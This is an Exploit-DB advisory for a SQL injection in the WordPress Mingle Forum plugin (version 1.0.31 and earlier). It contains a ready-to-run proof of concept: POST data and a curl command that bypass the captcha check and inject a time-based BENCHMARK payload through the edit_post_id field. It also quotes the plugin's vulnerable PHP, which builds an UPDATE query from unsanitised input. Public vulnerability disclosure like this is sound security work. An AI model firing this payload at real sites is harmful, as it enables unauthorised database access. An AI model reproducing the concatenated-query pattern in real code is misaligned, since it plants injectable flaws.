WordPress Plugin Mingle Forum 1.0.31 - SQL Injection

EDB-ID:

17894

CVE:





Platform:

PHP

Date:

2011-09-27


# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability
# Date: 2011-09-19
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip
# Version: 1.0.31 (tested)
# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
 wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php

---------------
Vulnerable code
---------------
    if (!isset($_POST['edit_post_submit'])) {
        $errormsg = apply_filters('wpwf_check_guestinfo',"");
        if ($errormsg != "") {
            $error = true;
            wp_die($errormsg);
        }
    }

    if($options['forum_captcha'] == true && !$user_ID){
        include_once(WPFPATH."captcha/shared.php");
        $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
            if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
              // do nothing
            }
            else {
                $error = true;
                $msg = __("Security code does not match", "mingleforum");
                wp_die($msg);
            }
    }

    ...

    if(isset($_POST['edit_post_submit'])){
        $myReplaceSub = array("'", "\\");
        $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
        $content = $mingleforum->input_filter($_POST['message']);
        $thread = $mingleforum->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id'];

        if($subject == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a subject", "mingleforum")."</p></div>");
            $error = true;
        }
        elseif($content == ""){
            $msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
            $msg .= ("<div id='error'><p>".__("You must enter a message", "mingleforum")."</p></div>");
            $error = true;
        }

        if ($error) wp_die($msg);

        //SECURITY FIX NEEDED <-- actual author's comment :)
        $sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
        $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)